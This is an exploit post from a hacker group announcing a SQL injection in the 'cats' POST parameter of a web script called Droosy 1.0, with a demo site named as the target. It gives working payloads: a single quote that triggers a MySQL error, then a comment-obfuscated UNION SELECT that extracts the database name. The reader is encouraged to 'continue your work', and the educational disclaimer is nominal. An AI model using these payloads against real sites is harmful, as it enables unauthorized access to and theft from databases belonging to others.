# Name Of Script : Droosy Version 1,0 # Comapny Site : http://www.emides.com/our_scripts.emi?id=14 # Demo : http://ad.ae/droosy/ # Found By : RoMaNcYxHaCkEr # Contact With Me : rxh0@hotmail.com # My Group : Security - Codes # My Homepage : WwW.Sec-Code.CoM # Type Of Exploit : Remote SQL Injection By [POST Method] # Explaintion Of Video Of This Exploit Download Here : http://www.mediafire.com/?zgtjzmznwd2 # Author has no responsibility over the damage you do with this! It,s Just Educational Manner :) ================================================================================================================== # P.O.C : The Vulne In Cat Variable In The Main Index But The Script Is Demo And We Try To Know The Variables Of Some File And The Mod_Rewrite Making The Proplem To Identify It,s ... The Proplem If You See The Video In Cats Variable Not On Search Box .... Here The Result Of Search : http://ad.ae/droosy/result.html Copy And Post This Variable If You Have Specific Tool For POST Method Like In Video If You See It,s :) : linkname=rxh&cats='&B1=%C5%C8%CD%CB So We See The Error : يبدو أن هنالك خطأ في قاعدة البيانات الخطأ هو : تم تنفيذ عبارة SQL خاطئة قاعدة البيانات قامت بإرجاع المعلومات التالية عن الخطأ :You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 رقم الخطأ الذي أعادته قاعدة البيانات: 1064 So Let,s Apply This linkname=rxh&cats='/**/union/**/select/**/0,1,database(),3,4,5,6/*&B1=%C5%C8%CD%CB And See The Name Of Database : adminad_droos So Continue Your Work ... :) ================================================================================================================== # Solution : Contact With Me I Will Filter This Fucking Uses :) # rXh # bEST wISHES